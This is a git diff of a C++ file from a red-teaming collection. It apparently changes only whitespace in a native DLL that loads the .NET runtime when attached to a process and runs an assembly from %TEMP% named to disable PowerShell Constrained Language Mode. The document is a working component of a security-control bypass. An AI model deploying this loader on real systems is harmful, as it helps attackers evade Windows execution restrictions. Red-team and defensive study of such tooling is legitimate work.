diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp b/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp
index 6737abb..41f8d2a 100644
--- a/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp
+++ b/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp
@@ -18,126 +18,126 @@ // Specify below .NET assembly, main class to instantiate and parameters to pass there.
 namespace CustomAssemblyParameters {
- LPCWSTR AssemblyName = L"%TEMP%\\ClmDisableAssembly.dll";
- LPCWSTR TypeName = L"ClmDisableAssembly.ClmDisableAssembly";
- LPCWSTR MethodName = L"Start";
- LPCWSTR Argument = L"(called from native CLR host)";
+ LPCWSTR AssemblyName = L"%TEMP%\\ClmDisableAssembly.dll";
+ LPCWSTR TypeName = L"ClmDisableAssembly.ClmDisableAssembly";
+ LPCWSTR MethodName = L"Start";
+ LPCWSTR Argument = L"(called from native CLR host)";
 }
 //////////////////////////////////////////////////
 #ifdef _DEBUG
-# define msg(x) MessageBoxW(nullptr, x, L"LoadCLRFromNativeDLL", 0)
+# define msg(x) MessageBoxW(nullptr, x, L"LoadCLRFromNativeDLL", 0)
 #else
-# define msg(x) ((void)0)
+# define msg(x) ((void)0)
 #endif
 void DoProcessAttach() {
- ICLRMetaHost *metaHost = nullptr;
- ICLRRuntimeInfo *runtimeInfo = nullptr;
- ICLRRuntimeHost *runtimeHost = nullptr;
- IEnumUnknown *runtime = nullptr;
- IUnknown *enumRuntime = nullptr;
+ ICLRMetaHost *metaHost = nullptr;
+ ICLRRuntimeInfo *runtimeInfo = nullptr;
+ ICLRRuntimeHost *runtimeHost = nullptr;
+ IEnumUnknown *runtime = nullptr;
+ IUnknown *enumRuntime = nullptr;
- LPWSTR frameworkName = nullptr;
- DWORD bytes = 2048;
- DWORD result = 0;
+ LPWSTR frameworkName = nullptr;
+ DWORD bytes = 2048;
+ DWORD result = 0;
- if (CLRCreateInstance(
- CLSID_CLRMetaHost,
- IID_ICLRMetaHost,
- reinterpret_cast(&metaHost)
- ) != S_OK) {
- msg(L"FAIL: Could not create MetaHost CLR instance.");
- return;
- }
+ if (CLRCreateInstance(
+ CLSID_CLRMetaHost,
+ IID_ICLRMetaHost,
+ reinterpret_cast(&metaHost)
+ ) != S_OK) {
+ msg(L"FAIL: Could not create MetaHost CLR instance.");
+ return;
+ }
- if (!metaHost || (metaHost->EnumerateInstalledRuntimes(
- &runtime
- ) != S_OK)) {
- msg(L"FAIL: Cannot enumerate installed runtimes.");
- return;
- }
+ if (!metaHost || (metaHost->EnumerateInstalledRuntimes(
+ &runtime
+ ) != S_OK)) {
+ msg(L"FAIL: Cannot enumerate installed runtimes.");
+ return;
+ }
- if (!runtime) {
- msg(L"FAIL: Could not find installed runtimes.");
- return;
- }
+ if (!runtime) {
+ msg(L"FAIL: Could not find installed runtimes.");
+ return;
+ }
- frameworkName = reinterpret_cast(LocalAlloc(
- LPTR,
- bytes
- ));
- if (!frameworkName) {
- msg(L"FAIL: could not allocate 2048 bytes for framework name buffer.");
- return;
- }
+ frameworkName = reinterpret_cast(LocalAlloc(
+ LPTR,
+ bytes
+ ));
+ if (!frameworkName) {
+ msg(L"FAIL: could not allocate 2048 bytes for framework name buffer.");
+ return;
+ }
- while (runtime->Next(1, &enumRuntime, 0) == S_OK) {
- if (enumRuntime && (enumRuntime->QueryInterface(&runtimeInfo) == S_OK)) {
- if (runtimeInfo != nullptr) {
- runtimeInfo->GetVersionString(frameworkName, &bytes);
- }
- }
- }
+ while (runtime->Next(1, &enumRuntime, 0) == S_OK) {
+ if (enumRuntime && (enumRuntime->QueryInterface(&runtimeInfo) == S_OK)) {
+ if (runtimeInfo != nullptr) {
+ runtimeInfo->GetVersionString(frameworkName, &bytes);
+ }
+ }
+ }
- if (runtimeInfo == nullptr || (runtimeInfo->GetInterface(
- CLSID_CLRRuntimeHost,
- IID_ICLRRuntimeHost,
- reinterpret_cast(&runtimeHost)
- ) != S_OK)) {
- msg(L"FAIL: Could not get CLRRuntimeHost interface's reference.");
- return;
- }
+ if (runtimeInfo == nullptr || (runtimeInfo->GetInterface(
+ CLSID_CLRRuntimeHost,
+ IID_ICLRRuntimeHost,
+ reinterpret_cast(&runtimeHost)
+ ) != S_OK)) {
+ msg(L"FAIL: Could not get CLRRuntimeHost interface's reference.");
+ return;
+ }
- if (runtimeHost == nullptr) {
- msg(L"FAIL: Could not obtain reference to CLRRuntimeHost.");
- return;
- }
+ if (runtimeHost == nullptr) {
+ msg(L"FAIL: Could not obtain reference to CLRRuntimeHost.");
+ return;
+ }
- runtimeHost->Start();
+ runtimeHost->Start();
- WCHAR assemblyPath[1024] = L"";
- ExpandEnvironmentStringsW(CustomAssemblyParameters::AssemblyName, assemblyPath, _countof(assemblyPath));
- LPCWSTR assemblyPathPtr = assemblyPath;
+ WCHAR assemblyPath[1024] = L"";
+ ExpandEnvironmentStringsW(CustomAssemblyParameters::AssemblyName, assemblyPath, _countof(assemblyPath));
+ LPCWSTR assemblyPathPtr = assemblyPath;
- HRESULT hres = runtimeHost->ExecuteInDefaultAppDomain(
- assemblyPathPtr,
- CustomAssemblyParameters::TypeName,
- CustomAssemblyParameters::MethodName,
- CustomAssemblyParameters::Argument,
- &result
- );
- if (hres != S_OK) {
- wchar_t msgbuf[1024] = L"";
- swprintf_s(msgbuf, L"FAIL: Could not invoke custom .NET assembly, instantiate it's type or invoke a method. HRESULT = 0x%08x . Assembly path: '%s'", hres, assemblyPath);
- msg(msgbuf);
- }
+ HRESULT hres = runtimeHost->ExecuteInDefaultAppDomain(
+ assemblyPathPtr,
+ CustomAssemblyParameters::TypeName,
+ CustomAssemblyParameters::MethodName,
+ CustomAssemblyParameters::Argument,
+ &result
+ );
+ if (hres != S_OK) {
+ wchar_t msgbuf[1024] = L"";
+ swprintf_s(msgbuf, L"FAIL: Could not invoke custom .NET assembly, instantiate it's type or invoke a method. HRESULT = 0x%08x . Assembly path: '%s'", hres, assemblyPath);
+ msg(msgbuf);
+ }
- //runtimeHost->Stop();
- //runtimeHost->Release();
- runtimeInfo->Release();
- metaHost->Release();
+ //runtimeHost->Stop();
+ //runtimeHost->Release();
+ runtimeInfo->Release();
+ metaHost->Release();
 }
 BOOLEAN WINAPI DllMain(
- IN HINSTANCE /*hDllHandle*/,
- IN DWORD nReason,
- IN LPVOID /*Reserved*/
+ IN HINSTANCE /*hDllHandle*/,
+ IN DWORD nReason,
+ IN LPVOID /*Reserved*/
 ) {
- switch (nReason)
- {
- case DLL_PROCESS_ATTACH:
- {
- DoProcessAttach();
- break;
- }
- case DLL_PROCESS_DETACH:
- case DLL_THREAD_ATTACH:
- case DLL_THREAD_DETACH:
- break;
- }
- return TRUE;
-}
\ No newline at end of file
+ switch (nReason)
+ {
+ case DLL_PROCESS_ATTACH:
+ {
+ DoProcessAttach();
+ break;
+ }
+ case DLL_PROCESS_DETACH:
+ case DLL_THREAD_ATTACH:
+ case DLL_THREAD_DETACH:
+ break;
+ }
+ return TRUE;
+}